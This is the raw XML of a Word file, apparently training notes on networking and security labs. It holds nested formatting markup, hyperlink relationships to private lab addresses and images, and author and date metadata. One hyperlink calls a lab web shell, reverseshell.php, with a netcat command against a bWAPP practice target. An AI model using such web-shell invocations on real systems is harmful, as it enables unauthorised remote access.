                                                                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                      </w:divBdr>
                                                                                      <w:divsChild>
                                                                                        <w:div w:id="1639652786">
                                                                                          <w:marLeft w:val="0"/>
                                                                                          <w:marRight w:val="0"/>
                                                                                          <w:marTop w:val="0"/>
                                                                                          <w:marBottom w:val="0"/>
                                                                                          <w:divBdr>
                                                                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                          </w:divBdr>
                                                                                          <w:divsChild>
                                                                                            <w:div w:id="156239351">
                                                                                              <w:marLeft w:val="0"/>
                                                                                              <w:marRight w:val="0"/>
                                                                                              <w:marTop w:val="0"/>
                                                                                              <w:marBottom w:val="0"/>
                                                                                              <w:divBdr>
                                                                                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                              </w:divBdr>
                                                                                              <w:divsChild>
                                                                                                <w:div w:id="1673221293">
                                                                                                  <w:marLeft w:val="0"/>
                                                                                                  <w:marRight w:val="0"/>
                                                                                                  <w:marTop w:val="0"/>
                                                                                                  <w:marBottom w:val="0"/>
                                                                                                  <w:divBdr>
                                                                                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                  </w:divBdr>
                                                                                                  <w:divsChild>
                                                                                                    <w:div w:id="454257220">
                                                                                                      <w:marLeft w:val="0"/>
                                                                                                      <w:marRight w:val="0"/>
                                                                                                      <w:marTop w:val="0"/>
                                                                                                      <w:marBottom w:val="0"/>
                                                                                                      <w:divBdr>
                                                                                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                      </w:divBdr>
                                                                                                      <w:divsChild>
                                                                                                        <w:div w:id="824590144">
                                                                                                          <w:marLeft w:val="0"/>
                                                                                                          <w:marRight w:val="0"/>
                                                                                                          <w:marTop w:val="0"/>
                                                                                                          <w:marBottom w:val="0"/>
                                                                                                          <w:divBdr>
                                                                                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                          </w:divBdr>
                                                                                                          <w:divsChild>
                                                                                                            <w:div w:id="2038386298">
                                                                                                              <w:marLeft w:val="300"/>
                                                                                                              <w:marRight w:val="0"/>
                                                                                                              <w:marTop w:val="0"/>
                                                                                                              <w:marBottom w:val="0"/>
                                                                                                              <w:divBdr>
                                                                                                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                              </w:divBdr>
                                                                                                              <w:divsChild>
                                                                                                                <w:div w:id="1532692347">
                                                                                                                  <w:marLeft w:val="-480"/>
                                                                                                                  <w:marRight w:val="0"/>
                                                                                                                  <w:marTop w:val="0"/>
                                                                                                                  <w:marBottom w:val="0"/>
                                                                                                                  <w:divBdr>
                                                                                                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                  </w:divBdr>
                                                                                                                  <w:divsChild>
                                                                                                                    <w:div w:id="886332134">
                                                                                                                      <w:marLeft w:val="0"/>
                                                                                                                      <w:marRight w:val="0"/>
                                                                                                                      <w:marTop w:val="0"/>
                                                                                                                      <w:marBottom w:val="0"/>
                                                                                                                      <w:divBdr>
                                                                                                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                      </w:divBdr>
                                                                                                                      <w:divsChild>
                                                                                                                        <w:div w:id="256401856">
                                                                                                                          <w:marLeft w:val="0"/>
                                                                                                                          <w:marRight w:val="0"/>
                                                                                                                          <w:marTop w:val="0"/>
                                                                                                                          <w:marBottom w:val="0"/>
                                                                                                                          <w:divBdr>
                                                                                                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                                                                          </w:divBdr>
                                                                                                                          <w:divsChild>
                                                                                                                            <w:div w:id="201086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hyperlink" Target="http://10.10.10.10/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.co.uk/url?sa=i&amp;rct=j&amp;q=&amp;esrc=s&amp;source=images&amp;cd=&amp;cad=rja&amp;uact=8&amp;ved=2ahUKEwjR3raezp_dAhWpKMAKHc_JB7QQjRx6BAgBEAU&amp;url=https://networkengineering.stackexchange.com/questions/34635/army-not-use-osi-model&amp;psig=AOvVaw2o5VONWGep9dD9FMUSMZb2&amp;ust=1536090726053708" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://loonytek.files.wordpress.com/2015/04/stack13.png" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.10" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.1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jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=WVKbfxo_pwE" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.10" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.co.uk/url?sa=i&amp;rct=j&amp;q=&amp;esrc=s&amp;source=images&amp;cd=&amp;cad=rja&amp;uact=8&amp;ved=2ahUKEwjirK3J95_dAhUNyoUKHQN1B2IQjRx6BAgBEAU&amp;url=https://slideplayer.com/slide/5203885/&amp;psig=AOvVaw1zafd7_Vqvd0Rv3JmAuqcG&amp;ust=1536101810538367"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10.0.0.1/bWAPP/documents/reverseshell.php?cmd=nc" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.1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6</TotalTime>
  <Pages>48</Pages>
  <Words>11435</Words>
  <Characters>65186</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Fujitsu</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>76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_d</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>David Richards</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-09-02T16:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-14T16:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>